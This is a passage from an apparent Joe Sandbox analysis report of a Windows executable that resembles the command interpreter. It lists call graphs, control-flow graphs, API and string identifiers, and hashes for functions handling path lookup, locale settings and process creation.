22331->22308 22333 7ff7cd48d003 GetConsoleOutputCP GetCPInfo 22332->22333 22334 7ff7cd4904f4 3 API calls 22333->22334 22334->22308 22336->22308 22337->22308 22339 7ff7cd49596c 22338->22339 22343 7ff7cd495a12 22338->22343 22340 7ff7cd49598d VirtualQuery 22339->22340 22339->22343 22341 7ff7cd4959ad 22340->22341 22340->22343 22342 7ff7cd4959b7 VirtualQuery 22341->22342 22341->22343 22342->22341 22342->22343 22343->22243 22348 7ff7cd4a76a3 22344->22348 22345 7ff7cd4a76b7 22347 7ff7cd4ae9b4 197 API calls 22345->22347 22346 7ff7cd4896b4 186 API calls 22346->22348 22349 7ff7cd4a76bc longjmp 22347->22349 22348->22345 22348->22346 22351 7ff7cd48dfe2 22350->22351 22352 7ff7cd48df93 22350->22352 22354 7ff7cd48e100 VirtualFree 22351->22354 22355 7ff7cd48e00b _setjmp 22351->22355 22352->22351 22353 7ff7cd48df9f GetProcessHeap RtlFreeHeap 22352->22353 22353->22351 22353->22352 22354->22351 22356 7ff7cd48e04a 22355->22356 22364 7ff7cd48e0c3 22355->22364 22357 7ff7cd48e600 473 API calls 22356->22357 22358 7ff7cd48e073 22357->22358 22359 7ff7cd48e0e0 longjmp 22358->22359 22360 7ff7cd48e081 22358->22360 22362 7ff7cd48e0b0 22359->22362 22361 7ff7cd48d250 475 API calls 22360->22361 22363 7ff7cd48e086 22361->22363 22362->22364 22380 7ff7cd4ad3fc 22362->22380 22363->22362 22367 7ff7cd48e600 473 API calls 22363->22367 22364->22305 22368 7ff7cd48e0a7 22367->22368 22368->22362 22369 7ff7cd4ad610 167 API calls 22368->22369 22369->22362 22371 7ff7cd4ac775 22370->22371 22378 7ff7cd4ac7ab 22370->22378 22372 7ff7cd48cd90 166 API calls 22371->22372 22374 7ff7cd4ac781 22372->22374 22373 7ff7cd4ac8d4 22373->22308 22374->22373 22375 7ff7cd48b0d8 194 API calls 22374->22375 22375->22373 22376 7ff7cd48b6b0 170 API calls 22376->22378 22377 7ff7cd48b038 _dup2 22377->22378 22378->22373 22378->22374 22378->22376 22378->22377 22379 7ff7cd48d208 _close 22378->22379 22379->22378 22396 7ff7cd4ad419 22380->22396 22381 7ff7cd49cadf 22382 7ff7cd4ad592 22384 7ff7cd493448 166 API calls 22382->22384 22383 7ff7cd4ad5c4 22386 7ff7cd493448 166 API calls 22383->22386 22385 7ff7cd4ad5a5 22384->22385 22388 7ff7cd4ad5ba 22385->22388 22391 7ff7cd493448 166 API calls 22385->22391 22386->22381 22398 7ff7cd4ad36c 22388->22398 22389 7ff7cd493448 166 API calls 22389->22396 22390 7ff7cd4ad546 22390->22383 22393 7ff7cd4ad555 22390->22393 22391->22388 22405 7ff7cd4ad31c 22393->22405 22394 7ff7cd4ad541 22394->22382 22394->22383 22394->22390 22395 7ff7cd4ad589 22394->22395 22395->22382 22395->22393 22396->22381 22396->22382 22396->22383 22396->22389 22396->22393 22396->22394 22397 7ff7cd4ad3fc 166 API calls 22396->22397 22397->22396 22399 7ff7cd4ad381 22398->22399 22400 7ff7cd4ad3d8 22398->22400 22401 7ff7cd4934a0 166 API calls 22399->22401 22403 7ff7cd4ad390 22401->22403 22402 7ff7cd493448 166 API calls 22402->22403 22403->22400 22403->22402 22404 7ff7cd4934a0 166 API calls 22403->22404 22404->22403 22406 7ff7cd493448 166 API calls 22405->22406 22407 7ff7cd4ad33b 22406->22407 22408 7ff7cd4ad36c 166 API calls 22407->22408 22409 7ff7cd4ad343 22408->22409 22410 7ff7cd4ad3fc 166 API calls 22409->22410 22427 7ff7cd4ad34e 22410->22427 22411 7ff7cd4ad592 22413 7ff7cd493448 166 API calls 22411->22413 22412 7ff7cd4ad5c4 22416 7ff7cd493448 166 API calls 22412->22416 22414 7ff7cd4ad5a5 22413->22414 22418 7ff7cd4ad5ba 22414->22418 22421 7ff7cd493448 166 API calls 22414->22421 22415 7ff7cd493448 166 API calls 22415->22427 22420 7ff7cd4ad5c2 22416->22420 22417 7ff7cd4ad31c 166 API calls 22417->22420 22422 7ff7cd4ad36c 166 API calls 22418->22422 22419 7ff7cd4ad546 22419->22412 22423 7ff7cd4ad555 22419->22423 22420->22381 22421->22418 22422->22420 22423->22417 22424 7ff7cd4ad541 22424->22411 22424->22412 22424->22419 22425 7ff7cd4ad589 22424->22425 22425->22411 22425->22423 22426 7ff7cd4ad3fc 166 API calls 22426->22427 22427->22411 22427->22412 22427->22415 22427->22420 22427->22423 22427->22424 22427->22426 22429 7ff7cd48c486 22428->22429 22430 7ff7cd48c4c9 22428->22430 22431 7ff7cd48c48e wcschr 22429->22431 22435 7ff7cd48c161 22429->22435 22433 7ff7cd48ff70 2 API calls 22430->22433 22430->22435 22432 7ff7cd48c4ef 22431->22432 22431->22435 22434 7ff7cd48cd90 166 API calls 22432->22434 22433->22435 22436 7ff7cd48c4f9 22434->22436 22435->22046 22435->22066 22436->22435 22437 7ff7cd48c5bd 22436->22437 22439 7ff7cd48d840 178 API calls 22436->22439 22441 7ff7cd48c541 22436->22441 22438 7ff7cd48b6b0 170 API calls 22437->22438 22437->22441 22438->22441 22439->22436 22440 7ff7cd48ff70 2 API calls 22440->22435 22441->22435 22441->22440 22443 7ff7cd48b018 22442->22443 22443->22111 22444->22111 22446 7ff7cd4a4621 22445->22446 22449 7ff7cd4872de 22445->22449 22448 7ff7cd4a447b longjmp 22446->22448 22454 7ff7cd4a4639 22446->22454 22469 7ff7cd4a475e 22446->22469 22472 7ff7cd4a47e0 22446->22472 22447 7ff7cd4872eb 22506 7ff7cd487348 22447->22506 22455 7ff7cd4a4492 22448->22455 22449->22447 22452 7ff7cd4a4530 22449->22452 22453 7ff7cd4a4467 22449->22453 22450 7ff7cd487348 168 API calls 22456 7ff7cd4a4524 22450->22456 22462 7ff7cd487348 168 API calls 22452->22462 22453->22447 22453->22455 22467 7ff7cd4a4475 22453->22467 22459 7ff7cd4a4695 22454->22459 22460 7ff7cd4a463e 22454->22460 22461 7ff7cd487348 168 API calls 22455->22461 22463 7ff7cd4872b0 168 API calls 22456->22463 22471 7ff7cd487323 22456->22471 22458 7ff7cd487315 22521 7ff7cd4873d4 22458->22521 22466 7ff7cd4873d4 168 API calls 22459->22466 22460->22448 22473 7ff7cd4a4654 22460->22473 22479 7ff7cd4a44a8 22461->22479 22480 7ff7cd4a4549 22462->22480 22470 7ff7cd4a480e 22463->22470 22464 7ff7cd487348 168 API calls 22464->22458 22484 7ff7cd4a469a 22466->22484 22467->22448 22467->22459 22468 7ff7cd487348 168 API calls 22468->22472 22469->22468 22470->22141 22471->22141 22472->22450 22481 7ff7cd487348 168 API calls 22473->22481 22474 7ff7cd4a45b2 22476 7ff7cd487348 168 API calls 22474->22476 22475 7ff7cd4a46e1 22482 7ff7cd4872b0 168 API calls 22475->22482 22483 7ff7cd4a45c7 22476->22483 22477 7ff7cd4a455e 22477->22474 22485 7ff7cd487348 168 API calls 22477->22485 22478 7ff7cd4a44e2 22488 7ff7cd4872b0 168 API calls 22478->22488 22479->22478 22487 7ff7cd487348 168 API calls 22479->22487 22480->22474 22480->22477 22493 7ff7cd487348 168 API calls 22480->22493 22481->22471 22489 7ff7cd4a4738 22482->22489 22486 7ff7cd487348 168 API calls 22483->22486 22484->22475 22498 7ff7cd4a46c7 22484->22498 22499 7ff7cd4a46ea 22484->22499 22485->22474 22492 7ff7cd4a45db 22486->22492 22487->22478 22490 7ff7cd4a44f1 22488->22490 22491 7ff7cd487348 168 API calls 22489->22491 22495 7ff7cd4872b0 168 API calls 22490->22495 22491->22456 22494 7ff7cd487348 168 API calls 22492->22494 22493->22477 22496 7ff7cd4a45ec 22494->22496 22497 7ff7cd4a4503 22495->22497 22501 7ff7cd487348 168 API calls 22496->22501 22497->22471 22503 7ff7cd487348 168 API calls 22497->22503 22498->22475 22504 7ff7cd487348 168 API calls 22498->22504 22500 7ff7cd487348 168 API calls 22499->22500 22500->22475 22502 7ff7cd4a4600 22501->22502 22505 7ff7cd487348 168 API calls 22502->22505 22503->22456 22504->22475 22505->22456 22513 7ff7cd48735d 22506->22513 22507 7ff7cd483278 166 API calls 22508 7ff7cd4a4820 longjmp 22507->22508 22509 7ff7cd4a4838 22508->22509 22510 7ff7cd483278 166 API calls 22509->22510 22511 7ff7cd4a4844 longjmp 22510->22511 22512 7ff7cd4a485a 22511->22512 22514 7ff7cd487348 166 API calls 22512->22514 22513->22507 22513->22509 22513->22513 22520 7ff7cd4873ab 22513->22520 22515 7ff7cd4a487b 22514->22515 22516 7ff7cd487348 166 API calls 22515->22516 22517 7ff7cd4a48ad 22516->22517 22518 7ff7cd487348 166 API calls 22517->22518 22519 7ff7cd4872ff 22518->22519 22519->22458 22519->22464 22522 7ff7cd487401 22521->22522 22522->22471 22523 7ff7cd487348 168 API calls 22522->22523 22524 7ff7cd4a487b 22523->22524 22525 7ff7cd487348 168 API calls 22524->22525 22526 7ff7cd4a48ad 22525->22526 22527 7ff7cd487348 168 API calls 22526->22527 22528 7ff7cd4a48be 22527->22528 22528->22471

                                        Executed Functions

                                        Function 00007FF7CD490A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                        • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                        • API String ID: 3305344409-4288247545
                                        • Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                        • Instruction ID: f59f466bf3d194420bf07580d70786908cb9e20fd8e180badbe2ab844d814d04
                                        • Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                        • Instruction Fuzzy Hash: 3C42D821B0CA8285EB60BF1298446B9A7A6AF857B5FC44135DF2E477D4FF3CE6458320
                                        Function 00007FF7CD48AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 216 7ff7cd48aa54-7ff7cd48aa98 call 7ff7cd48cd90 219 7ff7cd49bf5a-7ff7cd49bf70 call 7ff7cd494c1c call 7ff7cd48ff70 216->219 220 7ff7cd48aa9e 216->220 221 7ff7cd48aaa5-7ff7cd48aaa8 220->221 223 7ff7cd48acde-7ff7cd48ad00 221->223 224 7ff7cd48aaae-7ff7cd48aac8 wcschr 221->224 230 7ff7cd48ad06 223->230 224->223 227 7ff7cd48aace-7ff7cd48aae9 towlower 224->227 227->223 229 7ff7cd48aaef-7ff7cd48aaf3 227->229 233 7ff7cd49beb7-7ff7cd49bec4 call 7ff7cd4aeaf0 229->233 234 7ff7cd48aaf9-7ff7cd48aafd 229->234 231 7ff7cd48ad0d-7ff7cd48ad1f 230->231 237 7ff7cd48ad22-7ff7cd48ad2a call 7ff7cd4913e0 231->237 246 7ff7cd49bf43-7ff7cd49bf59 call 7ff7cd494c1c 233->246 247 7ff7cd49bec6-7ff7cd49bed8 call 7ff7cd483240 233->247 235 7ff7cd49bbcf 234->235 236 7ff7cd48ab03-7ff7cd48ab07 234->236 249 7ff7cd49bbde 235->249 239 7ff7cd48ab09-7ff7cd48ab0d 236->239 240 7ff7cd48ab7d-7ff7cd48ab81 236->240 237->221 243 7ff7cd48ab13-7ff7cd48ab17 239->243 244 7ff7cd49be63 239->244 240->244 248 7ff7cd48ab87-7ff7cd48ab95 240->248 243->240 250 7ff7cd48ab19-7ff7cd48ab1d 243->250 255 7ff7cd49be72-7ff7cd49be88 call 7ff7cd483278 call 7ff7cd494c1c 244->255 246->219 247->246 263 7ff7cd49beda-7ff7cd49bee9 call 7ff7cd483240 247->263 253 7ff7cd48ab98-7ff7cd48aba0 248->253 259 7ff7cd49bbea-7ff7cd49bbec 249->259 250->249 254 7ff7cd48ab23-7ff7cd48ab27 250->254 253->253 258 7ff7cd48aba2-7ff7cd48abb3 call 7ff7cd48cd90 253->258 254->259 261 7ff7cd48ab2d-7ff7cd48ab31 254->261 283 7ff7cd49be89-7ff7cd49be8c 255->283 258->219 269 7ff7cd48abb9-7ff7cd48abde call 7ff7cd4913e0 call 7ff7cd4933a8 258->269 265 7ff7cd49bbf8-7ff7cd49bc01 259->265 261->230 266 7ff7cd48ab37-7ff7cd48ab3b 261->266 277 7ff7cd49bef3-7ff7cd49bef9 263->277 278 7ff7cd49beeb-7ff7cd49bef1 263->278 265->231 266->265 270 7ff7cd48ab41-7ff7cd48ab45 266->270 305 7ff7cd48abe4-7ff7cd48abe7 269->305 306 7ff7cd48ac75 269->306 274 7ff7cd49bc06-7ff7cd49bc2a call 7ff7cd4913e0 270->274 275 7ff7cd48ab4b-7ff7cd48ab4f 270->275 294 7ff7cd49bc5a-7ff7cd49bc61 274->294 295 7ff7cd49bc2c-7ff7cd49bc4c _wcsnicmp 274->295 281 7ff7cd48ad2f-7ff7cd48ad33 275->281 282 7ff7cd48ab55-7ff7cd48ab78 call 7ff7cd4913e0 275->282 277->246 284 7ff7cd49befb-7ff7cd49bf0d call 7ff7cd483240 277->284 278->246 278->277 288 7ff7cd49bc66-7ff7cd49bc8a call 7ff7cd4913e0 281->288 289 7ff7cd48ad39-7ff7cd48ad3d 281->289 282->221 291 7ff7cd49be92-7ff7cd49beaa call 7ff7cd483278 call 7ff7cd494c1c 283->291 292 7ff7cd48acbe 283->292 284->246 303 7ff7cd49bf0f-7ff7cd49bf21 call 7ff7cd483240 284->303 324 7ff7cd49bcc4-7ff7cd49bcdc 288->324 325 7ff7cd49bc8c-7ff7cd49bcaa _wcsnicmp 288->325 297 7ff7cd48ad43-7ff7cd48ad49 289->297 298 7ff7cd49bcde-7ff7cd49bd02 call 7ff7cd4913e0 289->298 337 7ff7cd49beab-7ff7cd49beb6 call 7ff7cd494c1c 291->337 301 7ff7cd48acc0-7ff7cd48acc7 292->301 309 7ff7cd49bd31-7ff7cd49bd4f _wcsnicmp 294->309 295->294 304 7ff7cd49bc4e-7ff7cd49bc55 295->304 307 7ff7cd48ad4f-7ff7cd48ad68 297->307 308 7ff7cd49bd5e-7ff7cd49bd65 297->308 331 7ff7cd49bd04-7ff7cd49bd24 _wcsnicmp 298->331 332 7ff7cd49bd2a 298->332 301->301 311 7ff7cd48acc9-7ff7cd48acda 301->311 303->246 339 7ff7cd49bf23-7ff7cd49bf35 call 7ff7cd483240 303->339 319 7ff7cd49bbb3-7ff7cd49bbb7 304->319 305->292 321 7ff7cd48abed-7ff7cd48ac0b call 7ff7cd48cd90 * 2 305->321 316 7ff7cd48ac77-7ff7cd48ac7f 306->316 322 7ff7cd48ad6a 307->322 323 7ff7cd48ad6d-7ff7cd48ad70 307->323 308->307 320 7ff7cd49bd6b-7ff7cd49bd73 308->320 317 7ff7cd49bbc2-7ff7cd49bbca 309->317 318 7ff7cd49bd55 309->318 311->223 316->292 328 7ff7cd48ac81-7ff7cd48ac85 316->328 317->221 318->308 333 7ff7cd49bbba-7ff7cd49bbbd call 7ff7cd4913e0 319->333 334 7ff7cd49be4a-7ff7cd49be5e 320->334 335 7ff7cd49bd79-7ff7cd49bd8b iswxdigit 320->335 321->337 358 7ff7cd48ac11-7ff7cd48ac14 321->358 322->323 323->237 324->309 325->324 329 7ff7cd49bcac-7ff7cd49bcbf 325->329 340 7ff7cd48ac88-7ff7cd48ac8f 328->340 329->319 331->332 338 7ff7cd49bbac 331->338 332->309 333->317 334->333 335->334 342 7ff7cd49bd91-7ff7cd49bda3 iswxdigit 335->342 337->233 338->319 339->246 354 7ff7cd49bf37-7ff7cd49bf3e call 7ff7cd483240 339->354 340->340 345 7ff7cd48ac91-7ff7cd48ac94 340->345 342->334 347 7ff7cd49bda9-7ff7cd49bdbb iswxdigit 342->347 345->292 351 7ff7cd48ac96-7ff7cd48acaa wcsrchr 345->351 347->334 352 7ff7cd49bdc1-7ff7cd49bdd7 iswdigit 347->352 351->292 355 7ff7cd48acac-7ff7cd48acb9 call 7ff7cd491300 351->355 356 7ff7cd49bddf-7ff7cd49bdeb towlower 352->356 357 7ff7cd49bdd9-7ff7cd49bddd 352->357 354->246 355->292 361 7ff7cd49bdee-7ff7cd49be0f iswdigit 356->361 357->361 358->337 362 7ff7cd48ac1a-7ff7cd48ac33 memset 358->362 363 7ff7cd49be11-7ff7cd49be15 361->363 364 7ff7cd49be17-7ff7cd49be23 towlower 361->364 362->306 365 7ff7cd48ac35-7ff7cd48ac4b wcschr 362->365 366 7ff7cd49be26-7ff7cd49be45 call 7ff7cd4913e0 363->366 364->366 365->306 367 7ff7cd48ac4d-7ff7cd48ac54 365->367 366->334 368 7ff7cd48ad72-7ff7cd48ad91 wcschr 367->368 369 7ff7cd48ac5a-7ff7cd48ac6f wcschr 367->369 371 7ff7cd48af03-7ff7cd48af07 368->371 372 7ff7cd48ad97-7ff7cd48adac wcschr 368->372 369->306 369->368 371->306 372->371 373 7ff7cd48adb2-7ff7cd48adc7 wcschr 372->373 373->371 374 7ff7cd48adcd-7ff7cd48ade2 wcschr 373->374 374->371 375 7ff7cd48ade8-7ff7cd48adfd wcschr 374->375 375->371 376 7ff7cd48ae03-7ff7cd48ae18 wcschr 375->376 376->371 377 7ff7cd48ae1e-7ff7cd48ae21 376->377 378 7ff7cd48ae24-7ff7cd48ae27 377->378 378->371 379 7ff7cd48ae2d-7ff7cd48ae40 iswspace 378->379 380 7ff7cd48ae42-7ff7cd48ae49 379->380 381 7ff7cd48ae4b-7ff7cd48ae5e 379->381 380->378 382 7ff7cd48ae66-7ff7cd48ae6d 381->382 382->382 383 7ff7cd48ae6f-7ff7cd48ae77 382->383 383->255 384 7ff7cd48ae7d-7ff7cd48ae97 call 7ff7cd4913e0 383->384 387 7ff7cd48ae9a-7ff7cd48aea4 384->387 388 7ff7cd48aea6-7ff7cd48aead 387->388 389 7ff7cd48aebc-7ff7cd48aef8 call 7ff7cd490a6c call 7ff7cd48ff70 * 2 387->389 388->389 390 7ff7cd48aeaf-7ff7cd48aeba 388->390 389->316 397 7ff7cd48aefe 389->397 390->387 390->389 397->283
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                        • String ID: :$:$:$:ON$OFF
                                        • API String ID: 972821348-467788257
                                        • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                        • Instruction ID: 0d22c9a4b0c31640e32dad20064c3190ec93bd06ff7c4d8b9a73e75567398a24
                                        • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                        • Instruction Fuzzy Hash: 2522C421B0C74286EB54BF629854278E696EF54BA0FC88035CF2E87795FF7CA644C720
                                        Function 00007FF7CD4951EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 7ff7cd4951ec-7ff7cd495248 call 7ff7cd495508 GetLocaleInfoW 401 7ff7cd49ef32-7ff7cd49ef3c 398->401 402 7ff7cd49524e-7ff7cd495272 GetLocaleInfoW 398->402 405 7ff7cd49ef3f-7ff7cd49ef49 401->405 403 7ff7cd495274-7ff7cd49527a 402->403 404 7ff7cd495295-7ff7cd4952b9 GetLocaleInfoW 402->404 406 7ff7cd495280-7ff7cd495286 403->406 407 7ff7cd4954f7-7ff7cd4954f9 403->407 408 7ff7cd4952bb-7ff7cd4952c3 404->408 409 7ff7cd4952de-7ff7cd495305 GetLocaleInfoW 404->409 410 7ff7cd49ef61-7ff7cd49ef6c 405->410 411 7ff7cd49ef4b-7ff7cd49ef52 405->411 406->407 412 7ff7cd49528c-7ff7cd49528f 406->412 407->401 413 7ff7cd49ef75-7ff7cd49ef78 408->413 414 7ff7cd4952c9-7ff7cd4952d7 408->414 415 7ff7cd495321-7ff7cd495343 GetLocaleInfoW 409->415 416 7ff7cd495307-7ff7cd49531b 409->416 410->413 411->410 417 7ff7cd49ef54-7ff7cd49ef5f 411->417 412->404 420 7ff7cd49ef7a-7ff7cd49ef7d 413->420 421 7ff7cd49ef99-7ff7cd49efa3 413->421 414->409 418 7ff7cd49efaf-7ff7cd49efb9 415->418 419 7ff7cd495349-7ff7cd49536e GetLocaleInfoW 415->419 416->415 417->405 417->410 422 7ff7cd49efbc-7ff7cd49efc6 418->422 423 7ff7cd49eff2-7ff7cd49effc 419->423 424 7ff7cd495374-7ff7cd495396 GetLocaleInfoW 419->424 420->409 425 7ff7cd49ef83-7ff7cd49ef8d 420->425 421->418 426 7ff7cd49efc8-7ff7cd49efcf 422->426 427 7ff7cd49efde-7ff7cd49efe9 422->427 428 7ff7cd49efff-7ff7cd49f009 423->428 429 7ff7cd49f035-7ff7cd49f03f 424->429 430 7ff7cd49539c-7ff7cd4953be GetLocaleInfoW 424->430 425->421 426->427 432 7ff7cd49efd1-7ff7cd49efdc 426->432 427->423 433 7ff7cd49f021-7ff7cd49f02c 428->433 434 7ff7cd49f00b-7ff7cd49f012 428->434 431 7ff7cd49f042-7ff7cd49f04c 429->431 435 7ff7cd4953c4-7ff7cd4953e6 GetLocaleInfoW 430->435 436 7ff7cd49f078-7ff7cd49f082 430->436 437 7ff7cd49f064-7ff7cd49f06f 431->437 438 7ff7cd49f04e-7ff7cd49f055 431->438 432->422 432->427 433->429 434->433 440 7ff7cd49f014-7ff7cd49f01f 434->440 441 7ff7cd49f0bb-7ff7cd49f0c5 435->441 442 7ff7cd4953ec-7ff7cd49540e GetLocaleInfoW 435->442 439 7ff7cd49f085-7ff7cd49f08f 436->439 437->436 438->437 443 7ff7cd49f057-7ff7cd49f062 438->443 444 7ff7cd49f091-7ff7cd49f098 439->444 445 7ff7cd49f0a7-7ff7cd49f0b2 439->445 440->428 440->433 446 7ff7cd49f0c8-7ff7cd49f0d2 441->446 447 7ff7cd495414-7ff7cd495436 GetLocaleInfoW 442->447 448 7ff7cd49f0fe-7ff7cd49f108 442->448 443->431 443->437 444->445 450 7ff7cd49f09a-7ff7cd49f0a5 444->450 445->441 451 7ff7cd49f0d4-7ff7cd49f0db 446->451 452 7ff7cd49f0ea-7ff7cd49f0f5 446->452 453 7ff7cd49f141-7ff7cd49f14b 447->453 454 7ff7cd49543c-7ff7cd49545e GetLocaleInfoW 447->454 449 7ff7cd49f10b-7ff7cd49f115 448->449 457 7ff7cd49f117-7ff7cd49f11e 449->457 458 7ff7cd49f12d-7ff7cd49f138 449->458 450->439 450->445 451->452 460 7ff7cd49f0dd-7ff7cd49f0e8 451->460 452->448 459 7ff7cd49f14e-7ff7cd49f158 453->459 455 7ff7cd49f184-7ff7cd49f18b 454->455 456 7ff7cd495464-7ff7cd495486 GetLocaleInfoW 454->456 466 7ff7cd49f18e-7ff7cd49f198 455->466 461 7ff7cd49f1c4-7ff7cd49f1ce 456->461 462 7ff7cd49548c-7ff7cd4954ae GetLocaleInfoW 456->462 457->458 463 7ff7cd49f120-7ff7cd49f12b 457->463 458->453 464 7ff7cd49f170-7ff7cd49f17b 459->464 465 7ff7cd49f15a-7ff7cd49f161 459->465 460->446 460->452 469 7ff7cd49f1d1-7ff7cd49f1db 461->469 467 7ff7cd4954b4-7ff7cd4954f5 setlocale call 7ff7cd498f80 462->467 468 7ff7cd49f207-7ff7cd49f20e 462->468 463->449 463->458 464->455 465->464 470 7ff7cd49f163-7ff7cd49f16e 465->470 471 7ff7cd49f1b0-7ff7cd49f1bb 466->471 472 7ff7cd49f19a-7ff7cd49f1a1 466->472 477 7ff7cd49f211-7ff7cd49f21b 468->477 475 7ff7cd49f1f3-7ff7cd49f1fe 469->475 476 7ff7cd49f1dd-7ff7cd49f1e4 469->476 470->459 470->464 471->461 472->471 473 7ff7cd49f1a3-7ff7cd49f1ae 472->473 473->466 473->471 475->468 476->475 479 7ff7cd49f1e6-7ff7cd49f1f1 476->479 480 7ff7cd49f233-7ff7cd49f23e 477->480 481 7ff7cd49f21d-7ff7cd49f224 477->481 479->469 479->475 481->480 482 7ff7cd49f226-7ff7cd49f231 481->482 482->477 482->480
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: InfoLocale$DefaultUsersetlocale
                                        • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                        • API String ID: 1351325837-2236139042
                                        • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                        • Instruction ID: b2babf9aa371426257b97580b03aacec08c68d66b1f47fcb807a0b6a28bfa055
                                        • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                        • Instruction Fuzzy Hash: F6F14A21B0CA4295EF21AF12D5106B9B6AABF54BA0FD44136CF2D57694FF3CEA05C360
                                        Function 00007FF7CD494224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 483 7ff7cd494224-7ff7cd4942a5 InitializeProcThreadAttributeList 484 7ff7cd49ecd4-7ff7cd49ecee GetLastError call 7ff7cd4a9eec 483->484 485 7ff7cd4942ab-7ff7cd4942e5 UpdateProcThreadAttribute 483->485 492 7ff7cd49ed1e 484->492 487 7ff7cd49ecf0-7ff7cd49ed19 GetLastError call 7ff7cd4a9eec DeleteProcThreadAttributeList 485->487 488 7ff7cd4942eb-7ff7cd4943c6 memset * 2 GetStartupInfoW call 7ff7cd493a90 call 7ff7cd48b900 485->488 487->492 497 7ff7cd494638-7ff7cd494644 _local_unwind 488->497 498 7ff7cd4943cc-7ff7cd4943d3 488->498 499 7ff7cd494649-7ff7cd494650 497->499 498->499 500 7ff7cd4943d9-7ff7cd4943dc 498->500 499->500 503 7ff7cd494656-7ff7cd49465d 499->503 501 7ff7cd494415-7ff7cd494424 call 7ff7cd495a68 500->501 502 7ff7cd4943de-7ff7cd4943f5 wcsrchr 500->502 510 7ff7cd494589-7ff7cd494590 501->510 511 7ff7cd49442a-7ff7cd494486 CreateProcessW 501->511 502->501 504 7ff7cd4943f7-7ff7cd49440f lstrcmpW 502->504 503->501 506 7ff7cd494663 503->506 504->501 507 